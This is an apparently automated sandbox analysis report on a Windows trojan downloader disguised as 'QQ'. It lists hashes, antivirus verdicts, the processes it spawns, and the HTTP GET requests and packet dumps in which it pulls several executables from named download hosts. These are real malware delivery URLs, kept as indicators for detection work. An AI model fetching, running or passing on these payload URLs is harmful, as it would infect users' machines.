Analysis Date: 2016-01-08 00:22:10
MD5: c222d6ff6a5b887a088711a01b379a99
SHA1: bb83c79da066ce0e630a31406626217edc2b0814

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 992f7fe17e601e479b9505f8224ed649 sha1: 2229b0d08e0075035895934cc76565f17d27c59d size: 417792
Section .rdata: md5: f8a472cd5896e45cd3dfd296dc916165 sha1: 9b826423846158c5459ede1a02d5867001b18b7b size: 69632
Section .data: md5: 13c39ec56de7233aafbde8bdc86b50bd sha1: 20a7af4e130ce192bcee9b049ebad6b9fbdbd190 size: 61440
Section .rsrc: md5: 538c5b4eff37d774c0665190c52edd64 sha1: aff2bfb445d0420acba5bb36632c35f022071eed size: 122880
Timestamp: 2014-02-03 20:45:23
Version:
  LegalCopyright: 作者版权所有 请尊重并使用正版
  FileVersion: 1.0.0.0
  Comments: 本程序使用易语言编写(http://www.eyuyan.com)
  ProductName: QQ
  ProductVersion: 1.0.0.0
  FileDescription: 易语言程序
Packer: Microsoft Visual C++ v6.0
PEhash: 4bd95b2e6bd2061079b2b5ea8f9e7b13ba16f441
IMPhash: efbc0470f4fe2b0883dc2c2c51732fc1
AV CA (E-Trust Ino): No Virus
AV Rising: No Virus
AV Mcafee: RDN/Generic Downloader.x
AV Avira (antivir): TR/Dldr.Agent.675840.4
AV Twister: Trojan.558BEC6AFF68@1300.mg
AV Ad-Aware: Trojan.Generic.11136129
AV Alwil (avast): Evo-gen [Susp]
AV Eset (nod32): No Virus
AV Grisoft (avg): Win32/DH{Z05X?}
AV Symantec: No Virus
AV Fortinet: W32/Generic.AC.31005
AV BitDefender: Trojan.Generic.11136129
AV K7: No Virus
AV Microsoft Security Essentials: No Virus
AV MicroWorld (escan): Trojan.Generic.11136129
AV MalwareBytes: No Virus
AV Authentium: W32/Agent.EW.gen!Eldorado
AV Frisk (f-prot): W32/Agent.EW.gen!Eldorado
AV Ikarus: No Virus
AV Emsisoft: Trojan.Generic.11136129
AV Zillya!: No Virus
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: No Virus
AV CAT (quickheal): Trojan.Generic.r4
AV VirusBlokAda (vba32): No Virus
AV BullGuard: Trojan.Generic.11136129
AV Arcabit (arcavir): Trojan.Generic.11136129
AV ClamAV: No Virus
AV Dr. Web: Trojan.DownLoader18.42503
AV F-Secure: Trojan.Generic.11136129

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: c:\play_2061_4657.exe
Creates File: c:\70720000001.exe
Creates File: c:\kuping_s_50698.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: c:\setup_3048-4657.exe
Creates File: c:\93234_al.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: c:\setup_t10112.exe
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: c:\LD_2124_S.exe
Creates File: c:\zhan.exe
Creates File: c:\setup_jmss_3031.exe
Creates File: c:\01.exe
Creates Process: c://setup_jmss_3031.exe
Creates Process: c://setup_t10112.exe
Creates Process: c://93234_al.exe
Creates Process: c://zhan.exe
Creates Process: c://LD_2124_S.exe
Creates Process: c://70720000001.exe
Creates Process: c://kuping_s_50698.exe
Creates Process: c://01.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: cdn.bbi4.com
Winsock DNS: down.yinyue.fm
Winsock DNS: download.wk12345.com
Winsock DNS: down.guangsu.cn
Winsock DNS: qq2847894.b.xundisk.net
Winsock DNS: xz.657080.com
Winsock DNS: www.sj88.com
Winsock DNS: download.wallba.com

Process
↳ c://LD_2124_S.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\LD_212~1.EXE
Creates File: C:\WINDOWS\TEMP\scs2.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs1.tmp
Deletes File: C:\WINDOWS\TEMP\scs2.tmp

Process
↳ c://setup_t10112.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs4.tmp
Creates File: C:\WINDOWS\TEMP\scs3.tmp
Creates File: C:\SETUP_~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File: C:\WINDOWS\TEMP\scs4.tmp
Deletes File: C:\WINDOWS\TEMP\scs3.tmp

Process
↳ c://93234_al.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scs5.tmp
Creates File: C:\93234_AL.EXE
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\TEMP\scs6.tmp
Deletes File: C:\WINDOWS\TEMP\scs5.tmp
Deletes File: C:\WINDOWS\TEMP\scs6.tmp

Process
↳ c://70720000001.exe

Creates File: C:\707200~1.EXE
Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\WINDOWS\TEMP\scs7.tmp
Creates File: C:\WINDOWS\TEMP\scs8.tmp
Deletes File: C:\WINDOWS\TEMP\scs8.tmp
Deletes File: C:\WINDOWS\TEMP\scs7.tmp

Process
↳ c://kuping_s_50698.exe

Process
↳ c://zhan.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\ZHAN.EXE
Creates File: C:\WINDOWS\TEMP\scsA.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\TEMP\scs9.tmp
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes File: C:\WINDOWS\TEMP\scsA.tmp
Deletes File: C:\WINDOWS\TEMP\scs9.tmp

Process
↳ c://01.exe

Creates File: C:\WINDOWS\SYSTEM32\REDIR.EXE
Creates File: C:\WINDOWS\TEMP\scsC.tmp
Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\SYSTEM32\DOSX.EXE
Creates File: C:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates File: C:\01.EXE
Creates File: C:\WINDOWS\TEMP\scsB.tmp
Deletes File: C:\WINDOWS\TEMP\scsC.tmp
Deletes File: C:\WINDOWS\TEMP\scsB.tmp

Process
↳ c://setup_jmss_3031.exe

Creates File: C:\WINDOWS\SYSTEM32\COMMAND.COM
Creates File: C:\WINDOWS\TEMP\scsD.tmp
Creates File: C:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates File: C:\WINDOWS\TEMP\scsE.tmp

Network Details:

DNS: bgp5.yandui.com (Type: A) ➝ 183.131.193.69
DNS: bgp5.yandui.com (Type: A) ➝ 183.131.193.67
DNS: bgp5.yandui.com (Type: A) ➝ 183.131.193.68
DNS: sj88.www.web.glb0.ldcache.net (Type: A) ➝ 202.97.174.82
DNS: sj88.www.web.glb0.ldcache.net (Type: A) ➝ 202.97.174.81
DNS: m8.8ip.cc (Type: A) ➝ 45.124.65.232
DNS: download.wk12345.com (Type: A) ➝ 103.232.215.133
DNS: xz.657080.com (Type: A)
DNS: www.sj88.com (Type: A)
DNS: qq2847894.b.xundisk.net (Type: A)
DNS: down.yinyue.fm (Type: A)
DNS: cdn.bbi4.com (Type: A)
HTTP GET: http://xz.657080.com/download.php/LD_2124_S.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://www.sj88.com/hezi/jm/setup_t10112.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://qq2847894.b.xundisk.net/93234_al.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://qq2847894.b.xundisk.net/70720000001.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://qq2847894.b.xundisk.net/888.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://qq2847894.b.xundisk.net/01.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GET: http://download.wk12345.com/jmss/setup_jmss_3031.exe
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 183.131.193.69:80
Flows TCP: 192.168.1.1:1032 ➝ 202.97.174.82:80
Flows TCP: 192.168.1.1:1033 ➝ 45.124.65.232:80
Flows TCP: 192.168.1.1:1034 ➝ 45.124.65.232:80
Flows TCP: 192.168.1.1:1035 ➝ 45.124.65.232:80
Flows TCP: 192.168.1.1:1036 ➝ 45.124.65.232:80
Flows TCP: 192.168.1.1:1037 ➝ 103.232.215.133:80

Raw Pcap
0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642e7068   GET /download.ph
0x00000010 (00016)   702f4c44 5f323132 345f532e 65786520   p/LD_2124_S.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a20696d 6167652f 6769662c 20696d61   : image/gif, ima
0x00000040 (00064)   67652f78 2d786269 746d6170 2c20696d   ge/x-xbitmap, im
0x00000050 (00080)   6167652f 6a706567 2c20696d 6167652f   age/jpeg, image/
0x00000060 (00096)   706a7065 672c2061 70706c69 63617469   pjpeg, applicati
0x00000070 (00112)   6f6e2f78 2d73686f 636b7761 76652d66   on/x-shockwave-f
0x00000080 (00128)   6c617368 2c206170 706c6963 6174696f   lash, applicatio
0x00000090 (00144)   6e2f766e 642e6d73 2d657863 656c2c20   n/vnd.ms-excel, 
0x000000a0 (00160)   6170706c 69636174 696f6e2f 766e642e   application/vnd.
0x000000b0 (00176)   6d732d70 6f776572 706f696e 742c2061   ms-powerpoint, a
0x000000c0 (00192)   70706c69 63617469 6f6e2f6d 73776f72   pplication/mswor
0x000000d0 (00208)   642c202a 2f2a0d0a 52656665 7265723a   d, */*..Referer:
0x000000e0 (00224)   20687474 703a2f2f 787a2e36 35373038    http://xz.65708
0x000000f0 (00240)   302e636f 6d2f646f 776e6c6f 61642e70   0.com/download.p
0x00000100 (00256)   68702f4c 445f3231 32345f53 2e657865   hp/LD_2124_S.exe
0x00000110 (00272)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000120 (00288)   653a207a 682d636e 0d0a5573 65722d41   e: zh-cn..User-A
0x00000130 (00304)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000140 (00320)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000150 (00336)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000160 (00352)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x00000170 (00368)   787a2e36 35373038 302e636f 6d0d0a43   xz.657080.com..C
0x00000180 (00384)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000190 (00400)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303131 322e6578 65204854   up_t10112.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   696d6167 652f6769 662c2069 6d616765   image/gif, image
0x00000040 (00064)   2f782d78 6269746d 61702c20 696d6167   /x-xbitmap, imag
0x00000050 (00080)   652f6a70 65672c20 696d6167 652f706a   e/jpeg, image/pj
0x00000060 (00096)   7065672c 20617070 6c696361 74696f6e   peg, application
0x00000070 (00112)   2f782d73 686f636b 77617665 2d666c61   /x-shockwave-fla
0x00000080 (00128)   73682c20 6170706c 69636174 696f6e2f   sh, application/
0x00000090 (00144)   766e642e 6d732d65 7863656c 2c206170   vnd.ms-excel, ap
0x000000a0 (00160)   706c6963 6174696f 6e2f766e 642e6d73   plication/vnd.ms
0x000000b0 (00176)   2d706f77 6572706f 696e742c 20617070   -powerpoint, app
0x000000c0 (00192)   6c696361 74696f6e 2f6d7377 6f72642c   lication/msword,
0x000000d0 (00208)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x000000e0 (00224)   7474703a 2f2f7777 772e736a 38382e63   ttp://www.sj88.c
0x000000f0 (00240)   6f6d2f68 657a692f 6a6d2f73 65747570   om/hezi/jm/setup
0x00000100 (00256)   5f743130 3131322e 6578650d 0a416363   _t10112.exe..Acc
0x00000110 (00272)   6570742d 4c616e67 75616765 3a207a68   ept-Language: zh
0x00000120 (00288)   2d636e0d 0a557365 722d4167 656e743a   -cn..User-Agent:
0x00000130 (00304)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000140 (00320)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000150 (00336)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000160 (00352)   2e30290d 0a486f73 743a2077 77772e73   .0)..Host: www.s
0x00000170 (00368)   6a38382e 636f6d0d 0a436163 68652d43   j88.com..Cache-C
0x00000180 (00384)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000190 (00400)   0d0a0d0a 68650d0a 0d0a                ....he....

0x00000000 (00000)   47455420 2f393332 33345f61 6c2e6578   GET /93234_al.ex
0x00000010 (00016)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000020 (00032)   70743a20 696d6167 652f6769 662c2069   pt: image/gif, i
0x00000030 (00048)   6d616765 2f782d78 6269746d 61702c20   mage/x-xbitmap, 
0x00000040 (00064)   696d6167 652f6a70 65672c20 696d6167   image/jpeg, imag
0x00000050 (00080)   652f706a 7065672c 20617070 6c696361   e/pjpeg, applica
0x00000060 (00096)   74696f6e 2f782d73 686f636b 77617665   tion/x-shockwave
0x00000070 (00112)   2d666c61 73682c20 6170706c 69636174   -flash, applicat
0x00000080 (00128)   696f6e2f 766e642e 6d732d65 7863656c   ion/vnd.ms-excel
0x00000090 (00144)   2c206170 706c6963 6174696f 6e2f766e   , application/vn
0x000000a0 (00160)   642e6d73 2d706f77 6572706f 696e742c   d.ms-powerpoint,
0x000000b0 (00176)   20617070 6c696361 74696f6e 2f6d7377    application/msw
0x000000c0 (00192)   6f72642c 202a2f2a 0d0a5265 66657265   ord, */*..Refere
0x000000d0 (00208)   723a2068 7474703a 2f2f7171 32383437   r: http://qq2847
0x000000e0 (00224)   3839342e 622e7875 6e646973 6b2e6e65   894.b.xundisk.ne
0x000000f0 (00240)   742f3933 3233345f 616c2e65 78650d0a   t/93234_al.exe..
0x00000100 (00256)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000110 (00272)   207a682d 636e0d0a 55736572 2d416765    zh-cn..User-Age
0x00000120 (00288)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000130 (00304)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000140 (00320)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000150 (00336)   5420352e 30290d0a 486f7374 3a207171   T 5.0)..Host: qq
0x00000160 (00352)   32383437 3839342e 622e7875 6e646973   2847894.b.xundis
0x00000170 (00368)   6b2e6e65 740d0a43 61636865 2d436f6e   k.net..Cache-Con
0x00000180 (00384)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000190 (00400)   0d0a0d0a 68650d0a 0d0a                ....he....

0x00000000 (00000)   47455420 2f373037 32303030 30303031   GET /70720000001
0x00000010 (00016)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000020 (00032)   63636570 743a2069 6d616765 2f676966   ccept: image/gif
0x00000030 (00048)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000040 (00064)   702c2069 6d616765 2f6a7065 672c2069   p, image/jpeg, i
0x00000050 (00080)   6d616765 2f706a70 65672c20 6170706c   mage/pjpeg, appl
0x00000060 (00096)   69636174 696f6e2f 782d7368 6f636b77   ication/x-shockw
0x00000070 (00112)   6176652d 666c6173 682c2061 70706c69   ave-flash, appli
0x00000080 (00128)   63617469 6f6e2f76 6e642e6d 732d6578   cation/vnd.ms-ex
0x00000090 (00144)   63656c2c 20617070 6c696361 74696f6e   cel, application
0x000000a0 (00160)   2f766e64 2e6d732d 706f7765 72706f69   /vnd.ms-powerpoi
0x000000b0 (00176)   6e742c20 6170706c 69636174 696f6e2f   nt, application/
0x000000c0 (00192)   6d73776f 72642c20 2a2f2a0d 0a526566   msword, */*..Ref
0x000000d0 (00208)   65726572 3a206874 74703a2f 2f717132   erer: http://qq2
0x000000e0 (00224)   38343738 39342e62 2e78756e 6469736b   847894.b.xundisk
0x000000f0 (00240)   2e6e6574 2f373037 32303030 30303031   .net/70720000001
0x00000100 (00256)   2e657865 0d0a4163 63657074 2d4c616e   .exe..Accept-Lan
0x00000110 (00272)   67756167 653a207a 682d636e 0d0a5573   guage: zh-cn..Us
0x00000120 (00288)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000130 (00304)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000140 (00320)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000150 (00336)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000160 (00352)   73743a20 71713238 34373839 342e622e   st: qq2847894.b.
0x00000170 (00368)   78756e64 69736b2e 6e65740d 0a436163   xundisk.net..Cac
0x00000180 (00384)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f383838 2e657865 20485454   GET /888.exe HTT
0x00000010 (00016)   502f312e 310d0a41 63636570 743a2069   P/1.1..Accept: i
0x00000020 (00032)   6d616765 2f676966 2c20696d 6167652f   mage/gif, image/
0x00000030 (00048)   782d7862 69746d61 702c2069 6d616765   x-xbitmap, image
0x00000040 (00064)   2f6a7065 672c2069 6d616765 2f706a70   /jpeg, image/pjp
0x00000050 (00080)   65672c20 6170706c 69636174 696f6e2f   eg, application/
0x00000060 (00096)   782d7368 6f636b77 6176652d 666c6173   x-shockwave-flas
0x00000070 (00112)   682c2061 70706c69 63617469 6f6e2f76   h, application/v
0x00000080 (00128)   6e642e6d 732d6578 63656c2c 20617070   nd.ms-excel, app
0x00000090 (00144)   6c696361 74696f6e 2f766e64 2e6d732d   lication/vnd.ms-
0x000000a0 (00160)   706f7765 72706f69 6e742c20 6170706c   powerpoint, appl
0x000000b0 (00176)   69636174 696f6e2f 6d73776f 72642c20   ication/msword, 
0x000000c0 (00192)   2a2f2a0d 0a526566 65726572 3a206874   */*..Referer: ht
0x000000d0 (00208)   74703a2f 2f717132 38343738 39342e62   tp://qq2847894.b
0x000000e0 (00224)   2e78756e 6469736b 2e6e6574 2f383838   .xundisk.net/888
0x000000f0 (00240)   2e657865 0d0a4163 63657074 2d4c616e   .exe..Accept-Lan
0x00000100 (00256)   67756167 653a207a 682d636e 0d0a5573   guage: zh-cn..Us
0x00000110 (00272)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000120 (00288)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000130 (00304)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000140 (00320)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000150 (00336)   73743a20 71713238 34373839 342e622e   st: qq2847894.b.
0x00000160 (00352)   78756e64 69736b2e 6e65740d 0a436163   xundisk.net..Cac
0x00000170 (00368)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000180 (00384)   61636865 0d0a0d0a 6f6c3a20 6e6f2d63   ache....ol: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f30312e 65786520 48545450   GET /01.exe HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a20696d   /1.1..Accept: im
0x00000020 (00032)   6167652f 6769662c 20696d61 67652f78   age/gif, image/x
0x00000030 (00048)   2d786269 746d6170 2c20696d 6167652f   -xbitmap, image/
0x00000040 (00064)   6a706567 2c20696d 6167652f 706a7065   jpeg, image/pjpe
0x00000050 (00080)   672c2061 70706c69 63617469 6f6e2f78   g, application/x
0x00000060 (00096)   2d73686f 636b7761 76652d66 6c617368   -shockwave-flash
0x00000070 (00112)   2c206170 706c6963 6174696f 6e2f766e   , application/vn
0x00000080 (00128)   642e6d73 2d657863 656c2c20 6170706c   d.ms-excel, appl
0x00000090 (00144)   69636174 696f6e2f 766e642e 6d732d70   ication/vnd.ms-p
0x000000a0 (00160)   6f776572 706f696e 742c2061 70706c69   owerpoint, appli
0x000000b0 (00176)   63617469 6f6e2f6d 73776f72 642c202a   cation/msword, *
0x000000c0 (00192)   2f2a0d0a 52656665 7265723a 20687474   /*..Referer: htt
0x000000d0 (00208)   703a2f2f 71713238 34373839 342e622e   p://qq2847894.b.
0x000000e0 (00224)   78756e64 69736b2e 6e65742f 30312e65   xundisk.net/01.e
0x000000f0 (00240)   78650d0a 41636365 70742d4c 616e6775   xe..Accept-Langu
0x00000100 (00256)   6167653a 207a682d 636e0d0a 55736572   age: zh-cn..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 30290d0a 486f7374   ws NT 5.0)..Host
0x00000150 (00336)   3a207171 32383437 3839342e 622e7875   : qq2847894.b.xu
0x00000160 (00352)   6e646973 6b2e6e65 740d0a43 61636865   ndisk.net..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a0d0a 6f6c3a20 6e6f2d63   he......ol: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f6a6d73 732f7365 7475705f   GET /jmss/setup_
0x00000010 (00016)   6a6d7373 5f333033 312e6578 65204854   jmss_3031.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   696d6167 652f6769 662c2069 6d616765   image/gif, image
0x00000040 (00064)   2f782d78 6269746d 61702c20 696d6167   /x-xbitmap, imag
0x00000050 (00080)   652f6a70 65672c20 696d6167 652f706a   e/jpeg, image/pj
0x00000060 (00096)   7065672c 20617070 6c696361 74696f6e   peg, application
0x00000070 (00112)   2f782d73 686f636b 77617665 2d666c61   /x-shockwave-fla
0x00000080 (00128)   73682c20 6170706c 69636174 696f6e2f   sh, application/
0x00000090 (00144)   766e642e 6d732d65 7863656c 2c206170   vnd.ms-excel, ap
0x000000a0 (00160)   706c6963 6174696f 6e2f766e 642e6d73   plication/vnd.ms
0x000000b0 (00176)   2d706f77 6572706f 696e742c 20617070   -powerpoint, app
0x000000c0 (00192)   6c696361 74696f6e 2f6d7377 6f72642c   lication/msword,
0x000000d0 (00208)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x000000e0 (00224)   7474703a 2f2f646f 776e6c6f 61642e77   ttp://download.w
0x000000f0 (00240)   6b313233 34352e63 6f6d2f6a 6d73732f   k12345.com/jmss/
0x00000100 (00256)   73657475 705f6a6d 73735f33 3033312e   setup_jmss_3031.
0x00000110 (00272)   6578650d 0a416363 6570742d 4c616e67   exe..Accept-Lang
0x00000120 (00288)   75616765 3a207a68 2d636e0d 0a557365   uage: zh-cn..Use
0x00000130 (00304)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000140 (00320)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000150 (00336)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000160 (00352)   6f777320 4e542035 2e30290d 0a486f73   ows NT 5.0)..Hos
0x00000170 (00368)   743a2064 6f776e6c 6f61642e 776b3132   t: download.wk12
0x00000180 (00384)   3334352e 636f6d0d 0a436163 68652d43   345.com..Cache-C
0x00000190 (00400)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000001a0 (00416)   0d0a0d0a                              ....
Strings